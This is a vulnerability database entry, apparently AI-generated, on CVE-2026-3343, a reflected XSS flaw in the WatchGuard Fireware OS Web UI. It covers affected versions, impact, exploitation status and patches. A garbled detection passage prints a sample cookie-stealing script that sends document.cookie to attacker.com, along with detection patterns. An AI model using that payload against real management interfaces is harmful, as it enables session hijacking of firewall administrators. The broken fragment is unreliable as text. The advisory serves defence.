
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-3343 is a reflected cross-site scripting (XSS) vulnerability in the WatchGuard Fireware OS Web UI that allows execution of malicious JavaScript in the context of an authenticated management user's browser when they click a specially crafted link. It was published on March 3, 2026, with WatchGuard releasing advisory WGSA-2026-00004 on March 4, 2026. Affected versions include Fireware OS 12.7 through 12.11.7 and 2025.1 through 2026.1.1. The vulnerability carries a CVSS v3.1 base score of 6.1 (Medium) and a CVSS v4.0 base score of 5.1 (Medium) (WatchGuard Advisory, Red Hat CVE).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically a reflected XSS variant (CAPEC-591). The Fireware OS Web UI fails to properly sanitize user-supplied input before reflecting it back in HTTP responses, enabling an attacker to craft a malicious URL that, when visited by an authenticated management user, causes arbitrary JavaScript to execute in their browser session. No authentication is required on the attacker's side; however, the victim must be an authenticated management user who clicks the crafted link. No public proof-of-concept exploit code has been identified (WatchGuard Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript within the browser session of an authenticated WatchGuard firewall administrator. This can lead to session hijacking, credential theft, or unauthorized configuration changes to the firewall — including modifications to security policies, VPN settings, or access controls — without the victim's knowledge. Because the target must be a privileged management user, the potential impact on network security posture is significant despite the medium CVSS score (WatchGuard Advisory).
There is no evidence of active in-the-wild exploitation or a publicly available proof-of-concept at this time. The EPSS score is approximately 0.078%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires social engineering to trick an authenticated administrator into clicking a malicious link, which limits opportunistic exploitation (WatchGuard Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) in a query parameter.%3Cscript%3E, onerror=, onload=) in query strings; unexpected administrative configuration changes logged around the time of suspicious Web UI access.WatchGuard has released patched versions addressing this vulnerability: upgrade to Fireware OS 12.11.8 or later for the 12.x branch, or to 2026.1.2 or later for the 2025.x/2026.x branch. As a complementary measure, administrators should be educated about phishing risks and the dangers of clicking unsolicited links while authenticated to management interfaces. Restricting Web UI access to trusted management networks or VPNs can reduce the attack surface (WatchGuard Advisory).
The Canadian Centre for Cyber Security (CCCS) published a security advisory (AV26-189) referencing this vulnerability shortly after disclosure. Spain's INCIBE-CERT also catalogued the CVE. Community aggregators including Vulners, VulDB, and CVEFeed indexed the vulnerability promptly. No notable independent researcher commentary or significant social media discussion has been identified beyond routine CVE tracking (CCCS Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."